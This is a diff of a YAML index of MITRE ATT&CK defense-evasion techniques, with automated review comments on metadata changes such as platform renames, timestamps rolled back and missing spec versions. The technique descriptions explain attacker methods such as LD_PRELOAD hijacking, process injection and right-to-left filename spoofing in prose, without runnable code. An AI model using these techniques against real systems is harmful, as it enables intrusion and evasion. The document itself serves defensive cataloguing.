+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -7984,6 +8118,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -7992,18 +8127,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
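Review bot: the platform remap `Azure AD` / `Office 365` / `Google Workspace` to `Office Suite` / `Identity Provider` changes the strings that every per-platform index and filter matches on, so anything still selecting on the three old names will silently lose T1078.001 and the other remapped techniques. Check that the per-platform index files in this repo are regenerated in the same commit and that no downstream consumer hardcodes the old platform names. The `x_mitre_version` bump `'1.3'` to `'1.4'` matches the upstream object change.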
@@ -8035,14 +8170,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
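Review bot: `modified` moves backwards for T1574.006 here (`2023-05-09T14:00:00.188Z` to `2023-03-30T21:01:40.146Z`), and the same rollback recurs throughout the diff (T1222, T1134.002, T1548.001, T1218.008, T1055.013 and others). Most of the old values end in `14:00:00.188Z` or `14:49:39.188Z`, which looks like a release-time stamp rather than the object's own timestamp. If the new values are the real per-object `modified` from the STIX bundle, state that in the commit message so the change is not read as a regression, and check that nothing downstream compares `modified` to decide whether to re-import a technique, since a backwards move would make it skip these updates.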
@@ -8163,7 +8295,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Shared Library Injection via /etc/ld.so.preload
@@ -8312,12 +8443,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -8414,12 +8544,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -8451,11 +8580,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -8496,11 +8624,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -8556,12 +8683,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -8618,7 +8744,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -8869,7 +8994,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -8902,13 +9027,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
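Review bot: T1218.008 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` and gets nothing in return, so the object ends up with no attack spec version at all, while neighbours such as T1484.001 and T1078.001 are bumped to 3.2.0. Confirm this reflects the upstream object (older ATT&CK objects that have not been re-emitted can lack the field) rather than the generator dropping a key it does not recognise. The same pattern appears further down for T1055.013, T1574.005, T1036.002, T1542.002, T1600.002, T1055.004 and T1055.002, so one check of the generator output against the source bundle covers all of them.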
@@ -8970,10 +9093,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -9031,7 +9153,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -9073,7 +9194,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -9132,41 +9253,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -9175,20 +9265,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
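Review bot: `x_mitre_permissions_required: [User]` is removed from T1578.003 with nothing replacing it, and the Mandiant reference URL moves from `content.fireeye.com/m-trends/rpt-m-trends-2020` to `mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` while keeping the original "Retrieved April 24, 2020" date. The permissions field survives on other objects in this diff (T1574.005, T1600.002, T1055.002), so a consumer that filters on it will now treat this technique differently; note the upstream field removal in the commit message. For the reference, the `2021-09` path segment suggests the new location postdates the stated retrieval date, so either the retrieved date should be updated or the original URL kept; as written the citation is internally inconsistent.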
@@ -9218,7 +9338,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
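Review bot: the context lines above cite a December 8, 2015 post as "Retrieved December 4, 2014", a retrieval date a year before publication. This is upstream ATT&CK reference data rather than something this commit introduces, so it is not a blocker, but it is worth reporting upstream instead of carrying it forward in every regenerated index. The `modified` rollback `2020-10-27T14:49:39.188Z` to `2020-03-26T19:20:23.030Z` follows the same pattern as the rest of the diff and should be covered by the same explanation in the commit message.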
@@ -9253,8 +9373,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -9345,7 +9463,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests:
- name: Auditing Configuration Changes on Linux Host
@@ -9472,7 +9589,7 @@ defense-evasion:
elevation_required: true
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -9480,19 +9597,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
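Review bot: the new description ends with a trailing space inside the quoted scalar (`... [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`), which will round-trip into every regenerated output and show up as whitespace noise in rendered pages. It is upstream text, so the fix belongs in the generator (strip trailing whitespace on `description`) or in an upstream report. Content-wise the rewrite is an improvement: "An adversary with appropriate permissions" and the control-plane-to-data-plane wording make explicit that this technique presupposes IAM rights to edit security groups, which is the signal a detection should pivot on alongside the rule-creation and rule-modification events the `x_mitre_detection` text already names.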
@@ -9501,7 +9624,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -9524,9 +9647,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -9559,7 +9681,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -9578,8 +9700,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -9610,7 +9730,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -9640,12 +9760,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -9671,9 +9789,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
@@ -9704,14 +9821,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -9731,6 +9847,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -9738,7 +9855,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -9754,34 +9870,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1036.004:
@@ -9847,7 +9964,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.004
atomic_tests:
- name: linux rename /proc/pid/comm using prctl
@@ -9938,7 +10054,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -9987,8 +10103,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1647:
@@ -10039,7 +10153,7 @@ defense-evasion:
pairs to insert environment variables, such as LSEnvironment
,
to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation:
wardle chp2 persistence)(Citation: eset_osx_flashback)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T22:00:33.375Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Plist File Modification
x_mitre_detection: "Monitor for common command-line editors used to modify plist
@@ -10060,7 +10174,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1647
atomic_tests: []
T1553.005:
@@ -10127,7 +10240,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.005
atomic_tests: []
T1600.002:
@@ -10150,7 +10262,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:48.503Z'
name: Disable Crypto Hardware
description: |-
Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
@@ -10171,8 +10283,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542:
technique:
@@ -10233,11 +10343,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1612:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:22:09.807Z'
name: Build Image on Host
description: "Adversaries may build a container image directly on a host to
bypass defenses that monitor for the retrieval of malicious images from a
@@ -10302,7 +10411,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1612
atomic_tests: []
T1055.002:
@@ -10326,7 +10434,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
